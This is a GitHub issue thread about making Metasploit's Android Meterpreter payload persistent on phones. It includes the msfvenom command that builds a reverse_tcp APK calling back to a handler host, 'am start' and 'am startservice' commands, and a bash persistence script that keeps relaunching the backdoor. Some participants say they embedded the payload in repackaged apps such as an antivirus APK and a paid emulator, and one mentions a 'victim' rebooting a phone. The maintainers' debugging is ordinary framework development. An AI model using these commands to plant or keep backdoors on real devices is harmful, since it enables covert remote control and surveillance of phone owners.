not sure if its relevant, but #7378 landed 2 days ago, does that fix it?

7362 is still open, also possibly dealing with the same thing

The reason for the error is because since https://github.com/rapid7/metasploit-payloads/pull/104 landed, the activity will hide itself after it's initial launch. I'm considering turn this into an option instead as it seems to confuse people.
This is unrelated to 7362 and 7378.
You can replace am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
with am startservice com.metasploit.stage/.MainService, however I wouldn't recommend this approach as I'm not sure it works on recent versions (> 4.3 I think) of android unless you run the script as shell/root.
The service is supposed to make the session persistent, however it's trade off with battery life. I suspect we can make the service a bit more aggressive in restarting the session (e.g listening for CONNECTIVITY_CHANGE) at the expense of battery life :/

I tried to give the command that you told me but it happened this:

am startservice com.metasploit.stage/.MainService
Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.metasploit.stage/.MainService }
java.lang.SecurityException: Permission Denial: service asks to run as user -2 but is calling from user 0; this requires android.permission.INTERACT_ACROSS_USERS_FULL or android.permission.INTERACT_ACROSS_USERS
at android.os.Parcel.readException(Parcel.java:1620) at android.os.Parcel.readException(Parcel.java:1573) at android.app.ActivityManagerProxy.startService(ActivityManagerNative.java:4400)
at com.android.commands.am.Am.runStartService(Am.java:790)
at com.android.commands.am.Am.onRun(Am.java:364)
at com.android.internal.os.BaseCommand.run(BaseCommand.java:47)
at com.android.commands.am.Am.main(Am.java:103)
at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:257)

if I put the permissions inside the meterpreter, it might work?

Unfortunately this is because you're running on Android 6.0. That command will only work on Android 4.2 and lower. What makes you think the apk isn't currently persistent? Does the session not reconnect when you restart the device?

No, it doesn't. I tried so many times but there is no persistence. I before this apk new hiding while other one not, because it worked great persistence works fine on Android 6.0 devices

@timwr would you like me to back out rapid7/metasploit-payloads#104 to switch it to configurable behavior later? I've been teaching a few folks here how to use Android meterpreter lately, and this is something that has been confusing for them too.

Granted, I haven't experienced a lack of persistence locally. Sounds like we might be debugging 2 problems here. Technically @hacksoldier98's original restart loop shouldn't be needed anymore.

Agreed this is confusing for people. Let's revert for now and I can make it configurable later on.
Apologies!

@hacksoldier98 my mistake. I thought on Android 4.3 and up the am startservice was blocked, but it actually still works if you include the --user 0 argument, e.g you can still do:
am startservice --user 0 com.metasploit.stage/.MainService

sorry @timwr but not work. i have this error:
Error: Requires permission not exported from uid 10255

Will not run am com.metasploit.stage/.MainService
no apk /data/app

Because you haven't installed malware.apk in your telephone.

@Timwr are you trying to find the bug? if you have problems I can try to help but i didn't know much java

@hacksoldier98 I can't reproduce this unfortunately. Both am start and am startservice appear to work in the same way for me. We've reverted a change that prevented the am start command from working a second time.
The important thing is you actually shouldn't need to run either of those as the payload should be persistent anyway! If you're following this tutorial: http://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ it's out of date and unnecessary, and you'll just end up with more sessions which will make the OS more likely to kill all of your sessions.
If you're having issues with the payload reconnecting after connectivity loss then check that the LHOST on your handler is the same as the LHOST you give to msfvenom.

@timwr Yes it is always the same but the Lhost continues not to go there I am StartService am start. To tell the truth StartService part but as soon as I exit and then immediately exploits I have to wait long before it is connected or not return once more the connection

@Timwr Tim Now I created a shell that says this:

!/bin/bash

am startservice --user 0 com.metasploit.stage/.MainService
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

after I saved and I installed the backdoor with my public ip with the door attached to my local ip. after the installation was carried out I crushed on open and your computer's connection. from the computer I gave the Shell command to start the Shell on Android and this was the result:

Starting service: Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] cmp=com.metasploit.stage/.MainService }
Error: Requires permission not exported from uid 10265
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

@timwr now the command for use as a template doesn't work.. because as soon as I install it on the device goes into crash.. and the connection is only at that moment when you open the program until it stops.. I used avg antivirus for to put in the malware

Any solution to this issue soon? there is noway currently to make the Android payload persistent..

Apologies for the delay. This is getting a bit confusing as there are few potential issues flying around.

• The original issue: "the first time but the second works by this error" Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} has been fixed. I'm (perhaps pre-emptively) closing this issue.
• I don't recommend using the bash script method for persisting an Android payload as it results in multiple sessions, and as far as I know, doesn't make the payload more persistent.
• #7362 contains a fix to make msfvenom -x with an android payload persistent. Until this lands only the payload generated without -x will be persistent.
• Without -x the Android payload should already be persistent, if not this is a bug. I'll look into this further.
• @hacksoldier98 "I install it on the device goes into crash.. ": this looks like an issue specifically with the AVG apk. You'll need to look into this yourself with adb logcat and apktool
  I hope that makes sense :)

Thanks!

Regarding "Without -x the Android payload should already be persistent, if not this is a bug. I'll look into this further."

It depends on how you define persistent.
I generated the payload without X, it connects only in two cases:
1- Once you install it and open it the first time.
2- And when the victim reboots the phone.

But it does not try to reconnect every 20 seconds for example...

And when I try to run the bash script it gives the error below:
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

@mahmoudissam , when I switch Wifi off I get a new session over the data connection, and a new one again when I re-enable Wifi. I'll try leaving a few phones overnight, using lots of memory, etc.

• Is the LHOST on the handler you start exactly the same as the LHOST on the payload?
• Which payload are you using? e.g I'm testing with android/meterpreter/reverse_tcp
• Are you sure you're setting set ExitOnSession false and running with exploit -j?
  Many thanks for your help!

Hello Mate, thanks for your reply!

Here is the info:

1- Yes the LHOST are the same.
2- The command I use:
msfvenom -p android/meterpreter/reverse_tcp LHOST=domain.com LPORT=4444 R >shell.apk
3- I just use exploit (without -j) , do I have to add -j ?

If install the apk from root then you will work team. am and it is not necessary to specify --user 0

if the program was running as root then am runs it as root even if the user is not root

but it is always better to put --user 0 in the am

I found out that if you hide the app it wont work

I embed payload in apk and can use is normally as payload apk and original apk. it works and gives me meterpreter sessions and all, but after uploading persistance bash script on my android and executed inside shell gives me error.
gba emulator paid version i used for embeding.

(Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.)

Same problem here.

i have also used persistance.sh like other which discussed above.
I have also same problem .
when i use am startservice then i have face this error: Starting service: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage./.MainActivity }
Error: Not found; no service started.